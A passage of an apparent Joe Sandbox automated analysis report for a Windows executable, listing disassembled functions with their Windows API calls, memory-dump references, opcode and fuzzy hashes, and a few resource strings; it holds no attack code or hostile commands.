                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLeadNextlstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3156859252-0
                                                                                                                • Opcode ID: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                                                • Instruction ID: 0e3a410be327782064ec7343a9c9ba60b0fc100549801cd034d74be241764fb9
                                                                                                                • Opcode Fuzzy Hash: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                                                • Instruction Fuzzy Hash: C631D7352093C68ADB215F259C807ABBFA4AFF3358F1804AFD8C547352D76A4859C72B
                                                                                                                Function 004204F4 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004204F9
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042051F
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00451A7B: __EH_prolog.LIBCMT ref: 00451A80
                                                                                                                  • Part of subcall function 00451A7B: SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00451AB9
                                                                                                                • IsWindow.USER32(?), ref: 00420591
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004205B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedInvalidateMessageRectSendWindow__ftol
                                                                                                                • String ID:
                                                                                                                • API String ID: 1247432796-0
                                                                                                                • Opcode ID: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                                                • Instruction ID: 7cdaacfbf1fe49471af1143fd13cbce80a140e36cf0db1da9221879e06584097
                                                                                                                • Opcode Fuzzy Hash: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                                                • Instruction Fuzzy Hash: 25210471A00214BBCB10EF65CC46FEE77B8EF51754F00011EF801AB2D2DB78AA408BA9
                                                                                                                Function 00408304 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00408309
                                                                                                                • FrameRect.USER32(?,?,?), ref: 00408349
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00408356
                                                                                                                • FillRect.USER32(?,?,?), ref: 004083AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$FillFrameH_prologInflate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3463447664-0
                                                                                                                • Opcode ID: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                                                • Instruction ID: 006d8efee22706b5c6f664660fe7ec29989481165e9f17d750b5c126db11eac0
                                                                                                                • Opcode Fuzzy Hash: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                                                • Instruction Fuzzy Hash: 61215176800609DFCF10DFA5C9819EEB7B4FB54714F14863FE9A2A3690CB399A04CB55
                                                                                                                Function 004D4786 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 004D47E3
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D47F3
                                                                                                                • LocalFree.KERNEL32(?), ref: 004D47FC
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 004D4812
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                                                • Instruction ID: 8cf4eee74af497b272b1893a1d16c683aa14186811526e24e1cb218f27e42cd6
                                                                                                                • Opcode Fuzzy Hash: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                                                • Instruction Fuzzy Hash: ED215635200200EFD7249F88D895BAA77E4FF86755F10806FE9428B3A2C7B9E841CB58
                                                                                                                Function 0048079D Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 004807B6
                                                                                                                • WindowFromPoint.USER32(?,?), ref: 004807C2
                                                                                                                • GetActiveWindow.USER32 ref: 004807E5
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00480817
                                                                                                                  • Part of subcall function 00407729: InvalidateRect.USER32(?,00000000,00000001,004077EE,00000000), ref: 0040773E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRectWindow$ActiveClientFromPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2221759807-0
                                                                                                                • Opcode ID: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
                                                                                                                • Instruction ID: a089107a9771c350ead831e8e00b5bb5a12bcc199e39954db30e65ab6dd00094
                                                                                                                • Opcode Fuzzy Hash: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
                                                                                                                • Instruction Fuzzy Hash: 3E118171810344DFCF60FF64D848B9E77B8AF40349F01842FE40296251D7B8AA88CF95
                                                                                                                Function 004C80BB Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(?), ref: 004C80C9
                                                                                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004C80FF
                                                                                                                • GetTopWindow.USER32(00000000), ref: 004C810C
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 004C812A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1496643700-0
                                                                                                                • Opcode ID: 145cc8dbf22b260683246793b5ef2e64371eb4ca9d4bac4092889c159fcbf373
                                                                                                                • Instruction ID: a77f8250c159371a58dafb510189ea50f6f1655f5f1a4312a9fbfebb934a284f
                                                                                                                • Opcode Fuzzy Hash: 145cc8dbf22b260683246793b5ef2e64371eb4ca9d4bac4092889c159fcbf373
                                                                                                                • Instruction Fuzzy Hash: 79012D3A00111ABBCF526F919C08FEF3B65EF05350F05801EF91055161CB3AC922EFA9
                                                                                                                Function 004D08E2 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetActiveWindow.USER32(?), ref: 004D08F1
                                                                                                                • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 004D090C
                                                                                                                • DragQueryFile.SHELL32(?,00000000,?,00000104), ref: 004D092E
                                                                                                                • DragFinish.SHELL32(?), ref: 004D0947
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892977027-0
                                                                                                                • Opcode ID: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                                                • Instruction ID: 6273047b1dacdb82588a39171914f7888b0d2d7cb3e4b550b27c38d8e12f4d70
                                                                                                                • Opcode Fuzzy Hash: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                                                • Instruction Fuzzy Hash: DB01ADB1900108BFDF00AF64DC84CAE7BBCEF44398F11406AB164971A2CB70AE81CB68
                                                                                                                Function 004C8910 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 004C894E
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004C895A
                                                                                                                • GetSysColor.USER32(00000008), ref: 004C896A
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 004C8974
                                                                                                                  • Part of subcall function 004CD74E: GetWindowLongA.USER32(00000000,000000F0), ref: 004CD75F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2871169696-0
                                                                                                                • Opcode ID: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                                                • Instruction ID: 93f14773b1531431a45a83eb5b67c9d7019334d302a10841d722513c189ab90c
                                                                                                                • Opcode Fuzzy Hash: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                                                • Instruction Fuzzy Hash: 26014F79100108AFDFA19F64DC49FBF7B65AB21350F10452AF912D41E1DB35CD90DA5A
                                                                                                                Function 004D435C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(00526400), ref: 004D4397
                                                                                                                • RtlInitializeCriticalSection.NTDLL(00000000), ref: 004D43A9
                                                                                                                • RtlLeaveCriticalSection.NTDLL(00526400), ref: 004D43B2
                                                                                                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 004D43C4
                                                                                                                  • Part of subcall function 004D42C9: GetVersion.KERNEL32(?,004D436C,?,004D492E,00000010,00000000,00000100,?,?,?,004D3760,004D37C3,004D317A,004C9C8D,00000100,004C9C26), ref: 004D42DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 1193629340-0
                                                                                                                • Opcode ID: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                                                • Instruction ID: 7ca8f1db5bc0bee56fa40aa34dbc59f305261ca112b03702ed41f06256ae3a9e
                                                                                                                • Opcode Fuzzy Hash: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                                                • Instruction Fuzzy Hash: 76F04F3510021ADFCB20EF98ECD4967B3ACFF72316B41043BEA4182215D735B45ADAA8
                                                                                                                Function 00464BD4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00464BD9
                                                                                                                  • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                  • Part of subcall function 00465E15: __EH_prolog.LIBCMT ref: 00465E1A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                                                Strings
                                                                                                                • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 00464C4D
                                                                                                                • IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS, xrefs: 00464FB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$Increment$Decrement
                                                                                                                • String ID: IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS
                                                                                                                • API String ID: 3082256980-824710809
                                                                                                                • Opcode ID: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                                                • Instruction ID: dc456a8bdffd28551670642f11887b9e4bd3c64198162a74c682401b6d146edb
                                                                                                                • Opcode Fuzzy Hash: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                                                • Instruction Fuzzy Hash: DCD1B0B1910B049FCB14DF69C846BEEBBF4FF44314F10462EE456A7281DB78AA44CBA5
                                                                                                                Function 00470B28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00470B2D
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: .ts3$MSG_UPDATE_CLIENT_ENGINE
                                                                                                                • API String ID: 3164693477-4256904655
                                                                                                                • Opcode ID: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                                                • Instruction ID: 7b6b29c28156bd8d929e0febf03239d7c92f7645541b7d67c10a62d3710c1908
                                                                                                                • Opcode Fuzzy Hash: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                                                • Instruction Fuzzy Hash: E7B1A574915248EFCF04DFA5C985FDEBBB8AF05314F14805EF409A7282CB78AA44CB69
                                                                                                                Function 004285FF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00428604
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004286B9
                                                                                                                  • Part of subcall function 0040E49E: __EH_prolog.LIBCMT ref: 0040E4A3
                                                                                                                  • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E536
                                                                                                                  • Part of subcall function 0040E49E: lstrcpy.KERNEL32(?,?), ref: 0040E546
                                                                                                                  • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E56C
                                                                                                                  • Part of subcall function 0040E49E: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,?,?,?), ref: 0040E591
                                                                                                                  • Part of subcall function 0040E49E: GetLastError.KERNEL32 ref: 0040E59B
                                                                                                                  • Part of subcall function 0040E49E: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040E5CB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$CreateDecrementErrorInterlockedLastMultipleObjectsProcessWait__ftollstrcpy
                                                                                                                • String ID: 0:R
                                                                                                                • API String ID: 3493775157-2078724643
                                                                                                                • Opcode ID: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                                                • Instruction ID: d44a03b7b24bba7751bd61d5d34618116fb83859770f94f7d03436ead19a2939
                                                                                                                • Opcode Fuzzy Hash: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                                                • Instruction Fuzzy Hash: 4B51F636915215AADB04F7B6EC86FFE77A89F15724F20011FF101A61C2DF7C5A81826D
                                                                                                                Function 0047005A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047005F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 004C613F: __EH_prolog.LIBCMT ref: 004C6144
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C281A: __EH_prolog.LIBCMT ref: 004C281F
                                                                                                                  • Part of subcall function 004C61B3: lstrlen.KERNEL32(00000000,005108DC,?,?,004098A7,?,005108DC,00000000,?,00000000,00510870,00000000,?,?,?,00000002), ref: 004C61DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
